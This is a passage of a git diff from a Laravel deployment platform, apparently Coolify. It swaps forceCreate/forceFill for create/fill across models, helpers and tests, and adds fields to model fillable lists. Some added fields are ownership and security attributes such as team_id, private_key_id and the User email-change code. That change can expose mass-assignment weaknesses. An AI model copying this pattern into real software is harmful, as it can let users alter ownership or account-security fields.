-            ApplicationSetting::forceCreate([
+            ApplicationSetting::create([
                 'application_id' => $application->id,
             ]);
             $application->compose_parsing_version = self::$parserVersion;
diff --git a/app/Models/ApplicationDeploymentQueue.php b/app/Models/ApplicationDeploymentQueue.php
index 21cb58abe..67f28523c 100644
--- a/app/Models/ApplicationDeploymentQueue.php
+++ b/app/Models/ApplicationDeploymentQueue.php
@@ -44,6 +44,7 @@ class ApplicationDeploymentQueue extends Model
         'application_id',
         'deployment_uuid',
         'pull_request_id',
+        'docker_registry_image_tag',
         'force_rebuild',
         'commit',
         'status',
diff --git a/app/Models/ApplicationPreview.php b/app/Models/ApplicationPreview.php
index 818f96d8e..f08a48cea 100644
--- a/app/Models/ApplicationPreview.php
+++ b/app/Models/ApplicationPreview.php
@@ -11,6 +11,7 @@ class ApplicationPreview extends BaseModel
     use SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'application_id',
         'pull_request_id',
         'pull_request_html_url',
@@ -62,7 +63,7 @@ protected static function booted()
         });
         static::saving(function ($preview) {
             if ($preview->isDirty('status')) {
-                $preview->forceFill(['last_online_at' => now()]);
+                $preview->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/ApplicationSetting.php b/app/Models/ApplicationSetting.php
index 24b35df7f..731a9b5da 100644
--- a/app/Models/ApplicationSetting.php
+++ b/app/Models/ApplicationSetting.php
@@ -29,6 +29,7 @@ class ApplicationSetting extends Model
     ];
 
     protected $fillable = [
+        'application_id',
         'is_static',
         'is_git_submodules_enabled',
         'is_git_lfs_enabled',
diff --git a/app/Models/CloudProviderToken.php b/app/Models/CloudProviderToken.php
index 123376c9b..026d11fba 100644
--- a/app/Models/CloudProviderToken.php
+++ b/app/Models/CloudProviderToken.php
@@ -5,6 +5,7 @@
 class CloudProviderToken extends BaseModel
 {
     protected $fillable = [
+        'team_id',
         'provider',
         'token',
         'name',
diff --git a/app/Models/Environment.php b/app/Models/Environment.php
index 55ce93265..65ffaf579 100644
--- a/app/Models/Environment.php
+++ b/app/Models/Environment.php
@@ -28,6 +28,8 @@ class Environment extends BaseModel
     protected $fillable = [
         'name',
         'description',
+        'project_id',
+        'uuid',
     ];
 
     protected static function booted()
diff --git a/app/Models/GithubApp.php b/app/Models/GithubApp.php
index 3cffeb8f8..54bbb3f7d 100644
--- a/app/Models/GithubApp.php
+++ b/app/Models/GithubApp.php
@@ -7,6 +7,8 @@
 class GithubApp extends BaseModel
 {
     protected $fillable = [
+        'team_id',
+        'private_key_id',
         'name',
         'organization',
         'api_url',
diff --git a/app/Models/Project.php b/app/Models/Project.php
index ff2cae041..15628892e 100644
--- a/app/Models/Project.php
+++ b/app/Models/Project.php
@@ -27,6 +27,8 @@ class Project extends BaseModel
     protected $fillable = [
         'name',
         'description',
+        'team_id',
+        'uuid',
     ];
 
     /**
@@ -51,10 +53,10 @@ public static function ownedByCurrentTeamCached()
     protected static function booted()
     {
         static::created(function ($project) {
-            ProjectSetting::forceCreate([
+            ProjectSetting::create([
                 'project_id' => $project->id,
             ]);
-            Environment::forceCreate([
+            Environment::create([
                 'name' => 'production',
                 'project_id' => $project->id,
                 'uuid' => (string) new Cuid2,
diff --git a/app/Models/ProjectSetting.php b/app/Models/ProjectSetting.php
index 7ea17ba7a..8b59ffac6 100644
--- a/app/Models/ProjectSetting.php
+++ b/app/Models/ProjectSetting.php
@@ -6,7 +6,9 @@
 
 class ProjectSetting extends Model
 {
-    protected $fillable = [];
+    protected $fillable = [
+        'project_id',
+    ];
 
     public function project()
     {
diff --git a/app/Models/ScheduledDatabaseBackup.php b/app/Models/ScheduledDatabaseBackup.php
index c6aed863d..6308bae8b 100644
--- a/app/Models/ScheduledDatabaseBackup.php
+++ b/app/Models/ScheduledDatabaseBackup.php
@@ -9,6 +9,8 @@
 class ScheduledDatabaseBackup extends BaseModel
 {
     protected $fillable = [
+        'uuid',
+        'team_id',
         'description',
         'enabled',
         'save_s3',
diff --git a/app/Models/ScheduledDatabaseBackupExecution.php b/app/Models/ScheduledDatabaseBackupExecution.php
index f1f6e88b5..51ad46de9 100644
--- a/app/Models/ScheduledDatabaseBackupExecution.php
+++ b/app/Models/ScheduledDatabaseBackupExecution.php
@@ -7,6 +7,8 @@
 class ScheduledDatabaseBackupExecution extends BaseModel
 {
     protected $fillable = [
+        'uuid',
+        'scheduled_database_backup_id',
         'status',
         'message',
         'size',
diff --git a/app/Models/ScheduledTask.php b/app/Models/ScheduledTask.php
index e76f1b7b9..40f8e1860 100644
--- a/app/Models/ScheduledTask.php
+++ b/app/Models/ScheduledTask.php
@@ -30,12 +30,16 @@ class ScheduledTask extends BaseModel
     use HasSafeStringAttribute;
 
     protected $fillable = [
+        'uuid',
         'enabled',
         'name',
         'command',
         'frequency',
         'container',
         'timeout',
+        'team_id',
+        'application_id',
+        'service_id',
     ];
 
     public static function ownedByCurrentTeamAPI(int $teamId)
diff --git a/app/Models/ScheduledTaskExecution.php b/app/Models/ScheduledTaskExecution.php
index dd74ba2e0..1e26c7be3 100644
--- a/app/Models/ScheduledTaskExecution.php
+++ b/app/Models/ScheduledTaskExecution.php
@@ -23,6 +23,7 @@
 class ScheduledTaskExecution extends BaseModel
 {
     protected $fillable = [
+        'scheduled_task_id',
         'status',
         'message',
         'finished_at',
diff --git a/app/Models/Server.php b/app/Models/Server.php
index 427896a19..a18fe14ae 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -135,7 +135,7 @@ protected static function booted()
                     $payload['ip_previous'] = $server->getOriginal('ip');
                 }
             }
-            $server->forceFill($payload);
+            $server->fill($payload);
         });
         static::saved(function ($server) {
             if ($server->wasChanged('private_key_id') || $server->privateKey?->isDirty()) {
@@ -265,6 +265,7 @@ public static function flushIdentityMap(): void
         'detected_traefik_version',
         'traefik_outdated_info',
         'server_metadata',
+        'ip_previous',
     ];
 
     use HasSafeStringAttribute;
diff --git a/app/Models/ServerSetting.php b/app/Models/ServerSetting.php
index d34f2c86b..30fc1e165 100644
--- a/app/Models/ServerSetting.php
+++ b/app/Models/ServerSetting.php
@@ -54,6 +54,7 @@
 class ServerSetting extends Model
 {
     protected $fillable = [
+        'server_id',
         'is_swarm_manager',
         'is_jump_server',
         'is_build_server',
diff --git a/app/Models/Service.php b/app/Models/Service.php
index 491924c49..11189b4ac 100644
--- a/app/Models/Service.php
+++ b/app/Models/Service.php
@@ -49,6 +49,7 @@ class Service extends BaseModel
     private static $parserVersion = '5';
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'docker_compose_raw',
@@ -58,6 +59,10 @@ class Service extends BaseModel
         'config_hash',
         'compose_parsing_version',
         'is_container_label_escape_enabled',
+        'environment_id',
+        'server_id',
+        'destination_id',
+        'destination_type',
     ];
 
     protected $appends = ['server_status', 'status'];
diff --git a/app/Models/ServiceApplication.php b/app/Models/ServiceApplication.php
index e608c202d..6bf12f4e7 100644
--- a/app/Models/ServiceApplication.php
+++ b/app/Models/ServiceApplication.php
@@ -12,6 +12,7 @@ class ServiceApplication extends BaseModel
     use HasFactory, SoftDeletes;
 
     protected $fillable = [
+        'service_id',
         'name',
         'human_name',
         'description',
@@ -39,7 +40,7 @@ protected static function booted()
         });
         static::saving(function ($service) {
             if ($service->isDirty('status')) {
-                $service->forceFill(['last_online_at' => now()]);
+                $service->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/ServiceDatabase.php b/app/Models/ServiceDatabase.php
index e5b28d929..69801f985 100644
--- a/app/Models/ServiceDatabase.php
+++ b/app/Models/ServiceDatabase.php
@@ -10,6 +10,7 @@ class ServiceDatabase extends BaseModel
     use HasFactory, SoftDeletes;
 
     protected $fillable = [
+        'service_id',
         'name',
         'human_name',
         'description',
@@ -44,7 +45,7 @@ protected static function booted()
         });
         static::saving(function ($service) {
             if ($service->isDirty('status')) {
-                $service->forceFill(['last_online_at' => now()]);
+                $service->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index c6d91dd55..784e2c937 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -14,6 +14,7 @@ class StandaloneClickhouse extends BaseModel
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'clickhouse_admin_user',
@@ -40,6 +41,9 @@ class StandaloneClickhouse extends BaseModel
         'public_port_timeout',
         'custom_docker_run_options',
         'clickhouse_db',
+        'destination_type',
+        'destination_id',
+        'environment_id',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
@@ -71,7 +75,7 @@ protected static function booted()
         });
         static::saving(function ($database) {
             if ($database->isDirty('status')) {
-                $database->forceFill(['last_online_at' => now()]);
+                $database->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/StandaloneDocker.php b/app/Models/StandaloneDocker.php
index 09dae022b..dcb349405 100644
--- a/app/Models/StandaloneDocker.php
+++ b/app/Models/StandaloneDocker.php
@@ -13,6 +13,7 @@ class StandaloneDocker extends BaseModel
     use HasSafeStringAttribute;
 
     protected $fillable = [
+        'server_id',
         'name',
         'network',
     ];
diff --git a/app/Models/StandaloneDragonfly.php b/app/Models/StandaloneDragonfly.php
index af309f980..e07053c03 100644
--- a/app/Models/StandaloneDragonfly.php
+++ b/app/Models/StandaloneDragonfly.php
@@ -14,6 +14,7 @@ class StandaloneDragonfly extends BaseModel
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'dragonfly_password',
@@ -39,6 +40,9 @@ class StandaloneDragonfly extends BaseModel
         'public_port_timeout',
         'enable_ssl',
         'custom_docker_run_options',
+        'destination_type',
+        'destination_id',
+        'environment_id',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
@@ -70,7 +74,7 @@ protected static function booted()
         });
         static::saving(function ($database) {
             if ($database->isDirty('status')) {
-                $database->forceFill(['last_online_at' => now()]);
+                $database->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/StandaloneKeydb.php b/app/Models/StandaloneKeydb.php
index ee07b4783..979f45a3d 100644
--- a/app/Models/StandaloneKeydb.php
+++ b/app/Models/StandaloneKeydb.php
@@ -14,6 +14,7 @@ class StandaloneKeydb extends BaseModel
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'keydb_password',
@@ -40,6 +41,9 @@ class StandaloneKeydb extends BaseModel
         'public_port_timeout',
         'enable_ssl',
         'custom_docker_run_options',
+        'destination_type',
+        'destination_id',
+        'environment_id',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'server_status'];
@@ -71,7 +75,7 @@ protected static function booted()
         });
         static::saving(function ($database) {
             if ($database->isDirty('status')) {
-                $database->forceFill(['last_online_at' => now()]);
+                $database->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/StandaloneMariadb.php b/app/Models/StandaloneMariadb.php
index ad5220496..dba8a52f5 100644
--- a/app/Models/StandaloneMariadb.php
+++ b/app/Models/StandaloneMariadb.php
@@ -15,6 +15,7 @@ class StandaloneMariadb extends BaseModel
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'mariadb_root_password',
@@ -43,6 +44,9 @@ class StandaloneMariadb extends BaseModel
         'enable_ssl',
         'is_log_drain_enabled',
         'custom_docker_run_options',
+        'destination_type',
+        'destination_id',
+        'environment_id',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
@@ -74,7 +78,7 @@ protected static function booted()
         });
         static::saving(function ($database) {
             if ($database->isDirty('status')) {
-                $database->forceFill(['last_online_at' => now()]);
+                $database->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/StandaloneMongodb.php b/app/Models/StandaloneMongodb.php
index 590c173e1..e72f4f1c6 100644
--- a/app/Models/StandaloneMongodb.php
+++ b/app/Models/StandaloneMongodb.php
@@ -14,6 +14,7 @@ class StandaloneMongodb extends BaseModel
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'mongo_conf',
@@ -43,6 +44,9 @@ class StandaloneMongodb extends BaseModel
         'is_log_drain_enabled',
         'is_include_timestamps',
         'custom_docker_run_options',
+        'destination_type',
+        'destination_id',
+        'environment_id',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
@@ -80,7 +84,7 @@ protected static function booted()
         });
         static::saving(function ($database) {
             if ($database->isDirty('status')) {
-                $database->forceFill(['last_online_at' => now()]);
+                $database->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/StandaloneMysql.php b/app/Models/StandaloneMysql.php
index d991617b7..1c522d200 100644
--- a/app/Models/StandaloneMysql.php
+++ b/app/Models/StandaloneMysql.php
@@ -14,6 +14,7 @@ class StandaloneMysql extends BaseModel
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'mysql_root_password',
@@ -44,6 +45,9 @@ class StandaloneMysql extends BaseModel
         'is_log_drain_enabled',
         'is_include_timestamps',
         'custom_docker_run_options',
+        'destination_type',
+        'destination_id',
+        'environment_id',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
@@ -76,7 +80,7 @@ protected static function booted()
         });
         static::saving(function ($database) {
             if ($database->isDirty('status')) {
-                $database->forceFill(['last_online_at' => now()]);
+                $database->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/StandalonePostgresql.php b/app/Models/StandalonePostgresql.php
index 71034427f..57dfe5988 100644
--- a/app/Models/StandalonePostgresql.php
+++ b/app/Models/StandalonePostgresql.php
@@ -14,6 +14,7 @@ class StandalonePostgresql extends BaseModel
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'postgres_user',
@@ -46,6 +47,9 @@ class StandalonePostgresql extends BaseModel
         'is_log_drain_enabled',
         'is_include_timestamps',
         'custom_docker_run_options',
+        'destination_type',
+        'destination_id',
+        'environment_id',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
@@ -92,7 +96,7 @@ protected static function booted()
         });
         static::saving(function ($database) {
             if ($database->isDirty('status')) {
-                $database->forceFill(['last_online_at' => now()]);
+                $database->last_online_at = now();
             }
         });
     }
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index 4eb28e038..ef42d7f18 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -14,6 +14,7 @@ class StandaloneRedis extends BaseModel
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
+        'uuid',
         'name',
         'description',
         'redis_conf',
@@ -39,6 +40,9 @@ class StandaloneRedis extends BaseModel
         'is_log_drain_enabled',
         'is_include_timestamps',
         'custom_docker_run_options',
+        'destination_type',
+        'destination_id',
+        'environment_id',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
@@ -69,7 +73,7 @@ protected static function booted()
         });
         static::saving(function ($database) {
             if ($database->isDirty('status')) {
-                $database->forceFill(['last_online_at' => now()]);
+                $database->last_online_at = now();
             }
         });
 
diff --git a/app/Models/Subscription.php b/app/Models/Subscription.php
index fa135b29f..b0fec64f9 100644
--- a/app/Models/Subscription.php
+++ b/app/Models/Subscription.php
@@ -7,6 +7,7 @@
 class Subscription extends Model
 {
     protected $fillable = [
+        'team_id',
         'stripe_invoice_paid',
         'stripe_subscription_id',
         'stripe_customer_id',
diff --git a/app/Models/SwarmDocker.php b/app/Models/SwarmDocker.php
index 656749119..134e36189 100644
--- a/app/Models/SwarmDocker.php
+++ b/app/Models/SwarmDocker.php
@@ -7,6 +7,7 @@
 class SwarmDocker extends BaseModel
 {
     protected $fillable = [
+        'server_id',
         'name',
         'network',
     ];
diff --git a/app/Models/Tag.php b/app/Models/Tag.php
index 9ee58cf7d..e6fbd3a06 100644
--- a/app/Models/Tag.php
+++ b/app/Models/Tag.php
@@ -10,6 +10,7 @@ class Tag extends BaseModel
 
     protected $fillable = [
         'name',
+        'team_id',
     ];
 
     protected function customizeName($value)
diff --git a/app/Models/User.php b/app/Models/User.php
index ad9a7af31..aa33a49fb 100644
--- a/app/Models/User.php
+++ b/app/Models/User.php
@@ -49,6 +49,9 @@ class User extends Authenticatable implements SendsEmail
         'password',
         'force_password_reset',
         'marketing_emails',
+        'pending_email',
+        'email_change_code',
+        'email_change_code_expires_at',
     ];
 
     protected $hidden = [
@@ -409,7 +412,7 @@ public function requestEmailChange(string $newEmail): void
         $expiryMinutes = config('constants.email_change.verification_code_expiry_minutes', 10);
         $expiresAt = Carbon::now()->addMinutes($expiryMinutes);
 
-        $this->forceFill([
+        $this->fill([
             'pending_email' => $newEmail,
             'email_change_code' => $code,
             'email_change_code_expires_at' => $expiresAt,
diff --git a/bootstrap/helpers/applications.php b/bootstrap/helpers/applications.php
index e4feec692..48e0a8c78 100644
--- a/bootstrap/helpers/applications.php
+++ b/bootstrap/helpers/applications.php
@@ -214,7 +214,7 @@ function clone_application(Application $source, $destination, array $overrides =
         'updated_at',
         'additional_servers_count',
         'additional_networks_count',
-    ])->forceFill(array_merge([
+    ])->fill(array_merge([
         'uuid' => $uuid,
         'name' => $name,
         'fqdn' => $url,
@@ -237,7 +237,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
-        ])->forceFill([
+        ])->fill([
             'application_id' => $newApplication->id,
         ]);
         $newApplicationSettings->save();
@@ -257,7 +257,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
-        ])->forceFill([
+        ])->fill([
             'uuid' => (string) new Cuid2,
             'application_id' => $newApplication->id,
             'team_id' => currentTeam()->id,
@@ -272,7 +272,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
-        ])->forceFill([
+        ])->fill([
             'uuid' => (string) new Cuid2,
             'application_id' => $newApplication->id,
             'status' => 'exited',
@@ -304,7 +304,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'created_at',
             'updated_at',
             'uuid',
-        ])->forceFill([
+        ])->fill([
             'name' => $newName,
             'resource_id' => $newApplication->id,
         ]);
@@ -340,7 +340,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
-        ])->forceFill([
+        ])->fill([
             'resource_id' => $newApplication->id,
         ]);
         $newStorage->save();
@@ -354,7 +354,7 @@ function clone_application(Application $source, $destination, array $overrides =
                 'id',
                 'created_at',
                 'updated_at',
-            ])->forceFill([
+            ])->fill([
                 'resourceable_id' => $newApplication->id,
                 'resourceable_type' => $newApplication->getMorphClass(),
                 'is_preview' => false,
@@ -371,7 +371,7 @@ function clone_application(Application $source, $destination, array $overrides =
                 'id',
                 'created_at',
                 'updated_at',
-            ])->forceFill([
+            ])->fill([
                 'resourceable_id' => $newApplication->id,
                 'resourceable_type' => $newApplication->getMorphClass(),
                 'is_preview' => true,
diff --git a/bootstrap/helpers/parsers.php b/bootstrap/helpers/parsers.php
index 751851283..123cf906a 100644
--- a/bootstrap/helpers/parsers.php
+++ b/bootstrap/helpers/parsers.php
@@ -1597,7 +1597,7 @@ function serviceParser(Service $resource): Collection
                 if ($databaseFound) {
                     $savedService = $databaseFound;
                 } else {
-                    $savedService = ServiceDatabase::forceCreate([
+                    $savedService = ServiceDatabase::create([
                         'name' => $serviceName,
                         'service_id' => $resource->id,
                     ]);
@@ -1607,7 +1607,7 @@ function serviceParser(Service $resource): Collection
                 if ($applicationFound) {
                     $savedService = $applicationFound;
                 } else {
-                    $savedService = ServiceApplication::forceCreate([
+                    $savedService = ServiceApplication::create([
                         'name' => $serviceName,
                         'service_id' => $resource->id,
                     ]);
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index a43f2e340..cd773f6a9 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -1919,7 +1919,7 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
                     // Create new serviceApplication or serviceDatabase
                     if ($isDatabase) {
                         if ($isNew) {
-                            $savedService = ServiceDatabase::forceCreate([
+                            $savedService = ServiceDatabase::create([
                                 'name' => $serviceName,
                                 'image' => $image,
                                 'service_id' => $resource->id,
@@ -1930,7 +1930,7 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
                                 'service_id' => $resource->id,
                             ])->first();
                             if (is_null($savedService)) {
-                                $savedService = ServiceDatabase::forceCreate([
+                                $savedService = ServiceDatabase::create([
                                     'name' => $serviceName,
                                     'image' => $image,
                                     'service_id' => $resource->id,
@@ -1939,7 +1939,7 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
                         }
                     } else {
                         if ($isNew) {
-                            $savedService = ServiceApplication::forceCreate([
+                            $savedService = ServiceApplication::create([
                                 'name' => $serviceName,
                                 'image' => $image,
                                 'service_id' => $resource->id,
@@ -1950,7 +1950,7 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
                                 'service_id' => $resource->id,
                             ])->first();
                             if (is_null($savedService)) {
-                                $savedService = ServiceApplication::forceCreate([
+                                $savedService = ServiceApplication::create([
                                     'name' => $serviceName,
                                     'image' => $image,
                                     'service_id' => $resource->id,
diff --git a/tests/Feature/ApplicationHealthCheckApiTest.php b/tests/Feature/ApplicationHealthCheckApiTest.php
index 7f1b985ad..3e4078051 100644
--- a/tests/Feature/ApplicationHealthCheckApiTest.php
+++ b/tests/Feature/ApplicationHealthCheckApiTest.php
@@ -31,7 +31,7 @@
         );
     });
 
-    $this->project = Project::forceCreate([
+    $this->project = Project::create([
         'uuid' => (string) new Cuid2,
         'name' => 'test-project',
         'team_id' => $this->team->id,
diff --git a/tests/Feature/ApplicationRollbackTest.php b/tests/Feature/ApplicationRollbackTest.php
index 61b3505ae..432bdde1b 100644
--- a/tests/Feature/ApplicationRollbackTest.php
+++ b/tests/Feature/ApplicationRollbackTest.php
@@ -6,7 +6,7 @@
 describe('Application Rollback', function () {
     beforeEach(function () {
         $this->application = new Application;
-        $this->application->forceFill([
+        $this->application->fill([
             'uuid' => 'test-app-uuid',
             'git_commit_sha' => 'HEAD',
         ]);
diff --git a/tests/Feature/ClonePersistentVolumeUuidTest.php b/tests/Feature/ClonePersistentVolumeUuidTest.php
index 3f99c5585..13f7a1396 100644
--- a/tests/Feature/ClonePersistentVolumeUuidTest.php
+++ b/tests/Feature/ClonePersistentVolumeUuidTest.php
@@ -31,7 +31,7 @@
         'redirect' => 'both',
     ]);
 
-    $this->application->settings->forceFill([
+    $this->application->settings->fill([
         'is_container_label_readonly_enabled' => false,
     ])->save();
 
@@ -92,7 +92,7 @@
 });
 
 test('cloning application reassigns settings to the cloned application', function () {
-    $this->application->settings->forceFill([
+    $this->application->settings->fill([
         'is_static' => true,
         'is_spa' => true,
         'is_build_server_enabled' => true,
@@ -118,7 +118,7 @@
 });
 
 test('cloning application reassigns scheduled tasks and previews to the cloned application', function () {
-    $scheduledTask = ScheduledTask::forceCreate([
+    $scheduledTask = ScheduledTask::create([
         'uuid' => 'scheduled-task-original',
         'application_id' => $this->application->id,
         'team_id' => $this->team->id,
@@ -129,7 +129,7 @@
         'timeout' => 120,
     ]);
 
-    $preview = ApplicationPreview::forceCreate([
+    $preview = ApplicationPreview::create([
         'uuid' => 'preview-original',
         'application_id' => $this->application->id,
         'pull_request_id' => 123,
diff --git a/tests/Feature/ComposePreviewFqdnTest.php b/tests/Feature/ComposePreviewFqdnTest.php
index 62fc0f2d8..a5b8b2c9f 100644
--- a/tests/Feature/ComposePreviewFqdnTest.php
+++ b/tests/Feature/ComposePreviewFqdnTest.php
@@ -14,7 +14,7 @@
         ]),
     ]);
 
-    $preview = ApplicationPreview::forceCreate([
+    $preview = ApplicationPreview::create([
         'application_id' => $application->id,
         'pull_request_id' => 42,
         'pull_request_html_url' => 'https://github.com/example/repo/pull/42',
@@ -39,7 +39,7 @@
         ]),
     ]);
 
-    $preview = ApplicationPreview::forceCreate([
+    $preview = ApplicationPreview::create([
         'application_id' => $application->id,
         'pull_request_id' => 7,
         'pull_request_html_url' => 'https://github.com/example/repo/pull/7',
@@ -65,7 +65,7 @@
         ]),
     ]);
 
-    $preview = ApplicationPreview::forceCreate([
+    $preview = ApplicationPreview::create([
         'application_id' => $application->id,
         'pull_request_id' => 99,
         'pull_request_html_url' => 'https://github.com/example/repo/pull/99',
diff --git a/tests/Feature/DatabaseEnvironmentVariableApiTest.php b/tests/Feature/DatabaseEnvironmentVariableApiTest.php
index 78e80483b..f3297cf17 100644
--- a/tests/Feature/DatabaseEnvironmentVariableApiTest.php
+++ b/tests/Feature/DatabaseEnvironmentVariableApiTest.php
@@ -33,7 +33,7 @@
 
 function createDatabase($context): StandalonePostgresql
 {
-    return StandalonePostgresql::forceCreate([
+    return StandalonePostgresql::create([
         'name' => 'test-postgres',
         'image' => 'postgres:15-alpine',
         'postgres_user' => 'postgres',
diff --git a/tests/Feature/DatabasePublicPortTimeoutApiTest.php b/tests/Feature/DatabasePublicPortTimeoutApiTest.php
index 1ffc32a81..6bbc6279f 100644
--- a/tests/Feature/DatabasePublicPortTimeoutApiTest.php
+++ b/tests/Feature/DatabasePublicPortTimeoutApiTest.php
@@ -33,7 +33,7 @@
 
 describe('PATCH /api/v1/databases', function () {
     test('updates public_port_timeout on a postgresql database', function () {
-        $database = StandalonePostgresql::forceCreate([
+        $database = StandalonePostgresql::create([
             'name' => 'test-postgres',
             'image' => 'postgres:15-alpine',
             'postgres_user' => 'postgres',
@@ -57,7 +57,7 @@
     });
 
     test('updates public_port_timeout on a redis database', function () {
-        $database = StandaloneRedis::forceCreate([
+        $database = StandaloneRedis::create([
             'name' => 'test-redis',
             'image' => 'redis:7',
             'redis_password' => 'password',
@@ -79,7 +79,7 @@
     });
 
     test('rejects invalid public_port_timeout value', function () {
-        $database = StandalonePostgresql::forceCreate([
+        $database = StandalonePostgresql::create([
             'name' => 'test-postgres',
             'image' => 'postgres:15-alpine',
             'postgres_user' => 'postgres',
@@ -101,7 +101,7 @@
     });
 
     test('accepts null public_port_timeout', function () {
-        $database = StandalonePostgresql::forceCreate([
+        $database = StandalonePostgresql::create([
             'name' => 'test-postgres',
             'image' => 'postgres:15-alpine',
             'postgres_user' => 'postgres',
diff --git a/tests/Feature/DatabaseSslStatusRefreshTest.php b/tests/Feature/DatabaseSslStatusRefreshTest.php
index eab2b08db..e62ef48ad 100644
--- a/tests/Feature/DatabaseSslStatusRefreshTest.php
+++ b/tests/Feature/DatabaseSslStatusRefreshTest.php
@@ -52,7 +52,7 @@
     $project = Project::factory()->create(['team_id' => $this->team->id]);
     $environment = Environment::factory()->create(['project_id' => $project->id]);
 
-    $database = StandaloneMysql::forceCreate([
+    $database = StandaloneMysql::create([
         'name' => 'test-mysql',
         'image' => 'mysql:8',
         'mysql_root_password' => 'password',
@@ -70,7 +70,7 @@
     $component = Livewire::test(MysqlGeneral::class, ['database' => $database])
         ->assertDontSee('Database should be stopped to change this settings.');
 
-    $database->forceFill(['status' => 'running:healthy'])->save();
+    $database->fill(['status' => 'running:healthy'])->save();
 
     $component->call('refresh')
         ->assertSee('Database should be stopped to change this settings.');
diff --git a/tests/Feature/GetLogsCommandInjectionTest.php b/tests/Feature/GetLogsCommandInjectionTest.php
index 3e5a33b66..c0b17c3bd 100644
--- a/tests/Feature/GetLogsCommandInjectionTest.php
+++ b/tests/Feature/GetLogsCommandInjectionTest.php
@@ -69,7 +69,7 @@
 describe('GetLogs Livewire action validation', function () {
     test('getLogs rejects invalid container name', function () {
         // Make server functional by setting settings directly
-        $this->server->settings->forceFill([
+        $this->server->settings->fill([
             'is_reachable' => true,
             'is_usable' => true,
             'force_disabled' => false,
@@ -100,7 +100,7 @@
     });
 
     test('downloadAllLogs returns empty for invalid container name', function () {
-        $this->server->settings->forceFill([
+        $this->server->settings->fill([
             'is_reachable' => true,
             'is_usable' => true,
             'force_disabled' => false,
diff --git a/tests/Feature/GithubPrivateRepositoryTest.php b/tests/Feature/GithubPrivateRepositoryTest.php
index abc288519..ba66a10bb 100644
--- a/tests/Feature/GithubPrivateRepositoryTest.php
+++ b/tests/Feature/GithubPrivateRepositoryTest.php
@@ -31,7 +31,7 @@
         'team_id' => $this->team->id,
     ]);
 
-    $this->githubApp = GithubApp::forceCreate([
+    $this->githubApp = GithubApp::create([
         'name' => 'Test GitHub App',
         'api_url' => 'https://api.github.com',
         'html_url' => 'https://github.com',
diff --git a/tests/Feature/InternalModelCreationMassAssignmentTest.php b/tests/Feature/InternalModelCreationMassAssignmentTest.php
index fc581bf5c..5aad7f3e0 100644
--- a/tests/Feature/InternalModelCreationMassAssignmentTest.php
+++ b/tests/Feature/InternalModelCreationMassAssignmentTest.php
@@ -24,7 +24,7 @@
     ]);
     $destination = $server->standaloneDockers()->firstOrFail();
 
-    $application = Application::forceCreate([
+    $application = Application::create([
         'name' => 'internal-app',
         'git_repository' => 'https://github.com/coollabsio/coolify',
         'git_branch' => 'main',
@@ -57,7 +57,7 @@
     ]);
     $destination = $server->standaloneDockers()->firstOrFail();
 
-    $service = Service::forceCreate([
+    $service = Service::create([
